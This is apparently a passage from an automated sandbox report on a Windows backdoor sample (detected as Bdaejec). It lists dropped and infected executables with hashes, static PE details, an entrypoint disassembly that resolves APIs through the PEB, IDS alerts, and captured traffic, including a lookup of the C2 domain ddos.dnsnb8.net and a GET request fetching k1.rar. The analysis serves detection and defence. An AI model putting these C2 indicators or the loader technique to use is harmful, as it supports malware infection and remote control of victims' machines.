SSDEEP:	384:1FHSQXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:aIQGPL4vzZq2o9W7GsxBbPr
MD5:	F53A6BD117CBB10D686ED3312B007222
SHA1:	7ADEAB4BCF49454B4E1653D5B6A558D1E2E4E91D
SHA-256:	60EFDD3313120FB7480384C26FC021C4785B7F590B31177A9640BA13B8F45FB7
SHA-512:	B2BA1B394E2C9CC6DEADCAF0BD4141583AFD27DD816E4842DDEFA2C4FBD3E3CA140B64402F5D32BFF73ABD0F1C0DAB0B9A5356FE5B3E7E33A8919BE0D7C8F4A6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\sgKbPm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	2389504
Entropy (8bit):	6.731346075545792
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	DC53BD27CE91101C5040668B0EF35D0C
SHA1:	1BD78D2A427263E0549455BD0C7D5228F09B9783
SHA-256:	E61C317DD895D3EB4D7E4622F4802AA3D11913D5EB67B4EE6252AB5870255F3B
SHA-512:	B95CAC04F29F718E7B605DCAA548D37C629C49004793D2A0A2A01AD5B4844D7E638987A9CB82BD8ED777A6EEE9F92A7CCC23D408AFF5E9817A0C8C9F959ED590
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\sgKbPm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.366523743477492
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSd+5QGPL4vzZq2o9W7GsxBbPr:uHqaNrFd+uGCq2iW7z
MD5:	052A7EA8727A30E4CE34E84D45B9435D
SHA1:	BAD6FA394BE1DB74660D830E7B4C7C8417EC28B2
SHA-256:	B579EEBED40C8634C0E5E0346CBDD0571DD75C6180A5587050ADE0851F6BE16E
SHA-512:	4271F5D4A7C5C11CA4552D651BF462117C24ED455F671AB6E6EB738F0CEE2089DBE6C9C9A1506129366A79480FF7AD3A4732E915F7E70CA4179461DDAA1AC9F1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sgKbPm.exe_15788e6af638e4ca61bc4ad60d18f0c1b26e90_406eb2a6_75384484-70b2-4ba3-ad10-39d36d2c43d1\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9736945451858943
Encrypted:	false
SSDEEP:	192:D5O+rua0IdFzU91jM/JXzuiFsZ24IO8x:M+ruhIdFzU91jCzuiFsY4IO8x
MD5:	66362E4F236E12800E4F783FCBC96B33
SHA1:	13015B88FFDAA575B74A1EDA4D34947CB5123760
SHA-256:	428221BF18362AE58BBBF7E04AC5FAA67B422673D2E7D3A3C1B10CF35A10B284
SHA-512:	EEADD3B1B8CF19C84E8B6B9FF24F4DCE951E4C2E6DCBDFA61E4F9D7FC6C30451C4560C39DDE626E2F0BC2456DCD9770A6AEBF1503F7B1B3D3AD5AE4DE65A7DA8
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.8.5.8.7.0.1.6.2.8.3.2.6.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.8.5.8.7.0.2.2.2.2.0.7.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.3.8.4.4.8.4.-.7.0.b.2.-.4.b.a.3.-.a.d.1.0.-.3.9.d.3.6.d.2.c.4.3.d.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.9.8.8.2.6.f.-.9.9.b.c.-.4.b.d.e.-.a.a.4.c.-.a.3.f.6.8.b.f.1.8.b.f.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.g.K.b.P.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.f.c.-.0.0.0.1.-.0.0.1.4.-.c.b.4.3.-.3.b.1.f.1.b.5.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.9.e.7.7.7.1.b.3.a.e.6.f.c.4.7.8.0.1.9.a.5.9.5.2.5.1.4.6.6.6.d.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.s.g.K.b.P.m...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C47.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Dec 28 11:25:01 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	150320
Entropy (8bit):	1.861230218004245
Encrypted:	false
SSDEEP:	768:S/mdWJ9fURAHeQiuEvdkXug3/+M51xTgR2dzSO76d:2GAUOHe0h2M51xTgR2dzSOed
MD5:	AD7F49AA79498A57A04C86E5BF4D1513
SHA1:	67CCB4D5D5EA90EE4F40B68E5EDD23C3BBC3383A
SHA-256:	81A49598C39844E832DD237448E96A8FE7D3BE107BE153056DF0638752B42806
SHA-512:	D511E2C86C1C0C4B40B69FA5A6D42A0A1F87BD92A0539582AA6DADF6A8E10D96673E3D85214FBEB058D32C0BA0BF2196887D9A52B098BBC8B42A1BAF413CE717
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........og............D...............X.......<...$ ...........M..........`.......8...........T............=..............` ..........L"..............................................................................eJ......."......GenuineIntel............T.............og.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DDE.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6268
Entropy (8bit):	3.719944911351835
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbFr6YTYW+RogdTY85aMQUt89bPJUrsf4A9JCm:R6l7wVeJFr6eYW+6gzpDt89bCrsftWm
MD5:	04A70437E22A768C812CF3053E7141CC
SHA1:	B29E0AF290A57A4271E79D3DDEBEED789585A139
SHA-256:	F88474374C1838E2CF37F376E3568FAFDFC1E246BA08295751E9EE33366AB72A
SHA-512:	EACD31EC89C8AE54ADB08A9EB4E58B34F3985E1F3CE8595497114B9E34CC974BF385E6E03AB63057F0DCA4E72A500AF355F0970240ED5B5D9EAC30269FEA1A3A
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E0E.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.441861462434376
Encrypted:	false
SSDEEP:	48:cvIwWl8zs5rJg77aI9UnWpW8VYNYm8M4JE5FqP+q8Ik63gX3d:uIjfrI76W7VhJBP+ggX3d
MD5:	BD05420E6680730D0DCA1D34C8BE4E1E
SHA1:	FE1E2D519D3C78318AE994D79D1982F8763A1019
SHA-256:	B5047AA3AA1E3ED45B23F5D7660A2636186660E3E0DC0F1132724A7E0CAC2499
SHA-512:	02B4630DF57FAA2B124545C22938D9090641E6FED65BE2BAAC56683B6EFA129F9D7F02339D35D670C74C02F1DFDAC22731F79523725E8451FF95061B4D8555BD
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="651027" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\sgKbPm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\38BC2A60.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\sgKbPm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\sgKbPm.exe

Download File

Process:	C:\Users\user\Desktop\yRc7UfFif9.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031113762428177
Encrypted:	false
SSDEEP:	384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
MD5:	56B2C3810DBA2E939A8BB9FA36D3CF96
SHA1:	99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
SHA-256:	4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
SHA-512:	27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 97%
Joe Sandbox View:	Filename: gT6IitwToH.exe, Detection: malicious, Browse Filename: #U65b0#U7248#U7f51#U5173.exe, Detection: malicious, Browse Filename: #U8865#U4e01#U6253#U5305.exe, Detection: malicious, Browse Filename: #U65b0#U7248#U7f51#U5173Srv.exe, Detection: malicious, Browse Filename: gE4NVCZDRk.exe, Detection: malicious, Browse Filename: ib.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe, Detection: malicious, Browse Filename: 8VB4lVuZk3.exe, Detection: malicious, Browse Filename: biKy3nZEyJ.exe, Detection: malicious, Browse Filename: biKy3nZEyJ.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\sgKbPm.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.422079676412047
Encrypted:	false
SSDEEP:	6144:ESvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN80uhiTw:PvloTMW+EZMM6DFym03w
MD5:	C9BEC49C2CABA22C9B2209DCE535C3B3
SHA1:	17648BF896A87CC9A2FB17512BD1588B5CCD9882
SHA-256:	A2687EFFC3E3D0FEC0F134C3430412ED10D583055BB80227BABED37341D4172D
SHA-512:	0C1C7A16F8D1FBE2488F797EF2DB22524E891A45703BB79FFD58FB07D7C96234F7976053BB13C69BE4AEBE76F8199F5BBEFA14D7FF7326B46718CA4B6E438127
Malicious:	false
Preview:	regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..` .Y..............................................................................................................................................................................................................................................................................................................................................#Zw.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.5755407024684445
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	yRc7UfFif9.exe
File size:	82'432 bytes
MD5:	7acf6527ef4bef7f7325a94c4d92c1f9
SHA1:	8c39212f127dfe4c04b05f05b9e6759566ed207a
SHA256:	69e834be4264dab45e393e63952ae3b65f4e027a5928509c013b16175a43504b
SHA512:	9b44ea66ed3869c3454ec1882ca6a4d7ea8ff49a3c48908a8c90a48b1b6ca3488920b81a0d499849cdde6e1f4f43a4439bac2e96f819b8d8e626cd8c4b094b93
SSDEEP:	1536:Yg/6/tM8NXDjPX0QWlfGMckTQlXGCq2iW7z:Hk3U8kTQRGCH
TLSH:	82838D61B980C073C44A6079441DC7B19F7FBC3126B5C997BB960BBB5F313D1EA2A24A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S...2...2...2.......2...2...2...}8..2...`*..2...`;..2...`-..2...`?..2..Rich.2..........................PE..L......Q...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x414000
Entrypoint Section:	wu
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x518BB101 [Thu May 9 14:21:53 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	ba2c974ed567c90fe365844af978f320

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 624B6773h
mov dword ptr [ebp-44h], 652E6D50h
mov dword ptr [ebp-40h], 00006578h
mov dword ptr [ebp-3Ch], 00000000h
call 00007FCABD2B6E25h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFFEE3A2h
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007FCABD2B6F6Eh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007FCABD2B6E74h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007FCABD2B6E6Bh

Rich Headers

Programming Language:

[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf934	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xf488	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xe000	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xc9ed	0xca00	9c1449c399f02a55d49d67dd9413e89c	False	0.6139193997524752	data	6.618135871473556	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xe000	0x2068	0x2200	c3c323d1b4244bb08b2144d7f6ccb84f	False	0.349609375	data	5.290951954639895	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x11000	0x2bc4	0x1000	3ecb8d5c354d07019fd9bd96c5e5f3a1	False	0.20947265625	data	2.251287542215587	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wu	0x14000	0x5000	0x4200	27022e791ba25b0ee9385b003e074038	False	0.7772253787878788	data	6.934516547069036	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

GenerateConsoleCtrlEvent, GetExitCodeProcess, WaitForSingleObject, CreateProcessA, SetConsoleCtrlHandler, GetModuleFileNameA, EnterCriticalSection, LeaveCriticalSection, GetModuleHandleW, Sleep, GetProcAddress, ExitProcess, GetCommandLineA, GetStartupInfoA, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetLastError, HeapFree, HeapAlloc, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, LoadLibraryA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, HeapReAlloc, VirtualAlloc, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, HeapSize, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA, CompareStringA, CompareStringW, SetEnvironmentVariableA, ReadFile, SetEndOfFile, GetProcessHeap, GetFileAttributesA

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-28T12:24:57.491932+0100	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	1	192.168.2.5	55185	1.1.1.1	53	UDP
2024-12-28T12:24:59.104038+0100	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	1	192.168.2.5	49704	44.221.84.105	799	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 12:24:58.006356001 CET	49704	799	192.168.2.5	44.221.84.105
Dec 28, 2024 12:24:58.125968933 CET	799	49704	44.221.84.105	192.168.2.5
Dec 28, 2024 12:24:58.126077890 CET	49704	799	192.168.2.5	44.221.84.105
Dec 28, 2024 12:24:58.126735926 CET	49704	799	192.168.2.5	44.221.84.105
Dec 28, 2024 12:24:58.246265888 CET	799	49704	44.221.84.105	192.168.2.5
Dec 28, 2024 12:24:59.103800058 CET	799	49704	44.221.84.105	192.168.2.5
Dec 28, 2024 12:24:59.103956938 CET	799	49704	44.221.84.105	192.168.2.5
Dec 28, 2024 12:24:59.104038000 CET	49704	799	192.168.2.5	44.221.84.105
Dec 28, 2024 12:24:59.119354010 CET	49704	799	192.168.2.5	44.221.84.105
Dec 28, 2024 12:24:59.239193916 CET	799	49704	44.221.84.105	192.168.2.5
Dec 28, 2024 12:25:01.967930079 CET	49705	799	192.168.2.5	44.221.84.105
Dec 28, 2024 12:25:02.087553978 CET	799	49705	44.221.84.105	192.168.2.5
Dec 28, 2024 12:25:02.087646961 CET	49705	799	192.168.2.5	44.221.84.105
Dec 28, 2024 12:25:03.037431002 CET	799	49705	44.221.84.105	192.168.2.5
Dec 28, 2024 12:25:03.037462950 CET	799	49705	44.221.84.105	192.168.2.5
Dec 28, 2024 12:25:03.037506104 CET	49705	799	192.168.2.5	44.221.84.105
Dec 28, 2024 12:25:03.037527084 CET	49705	799	192.168.2.5	44.221.84.105
Dec 28, 2024 12:25:38.472609043 CET	49705	799	192.168.2.5	44.221.84.105

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 12:24:57.491931915 CET	55185	53	192.168.2.5	1.1.1.1
Dec 28, 2024 12:24:57.998853922 CET	53	55185	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 12:24:57.491931915 CET	192.168.2.5	1.1.1.1	0x6e9f	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 12:24:57.998853922 CET	1.1.1.1	192.168.2.5	0x6e9f	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	44.221.84.105	799	7164	C:\Users\user\AppData\Local\Temp\sgKbPm.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 12:24:58.126735926 CET	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Target ID:	0
Start time:	06:24:55
Start date:	28/12/2024
Path:	C:\Users\user\Desktop\yRc7UfFif9.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\yRc7UfFif9.exe"
Imagebase:	0x400000
File size:	82'432 bytes
MD5 hash:	7ACF6527EF4BEF7F7325A94C4D92C1F9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:24:56
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\sgKbPm.exe
Wow64 process (32bit):	true
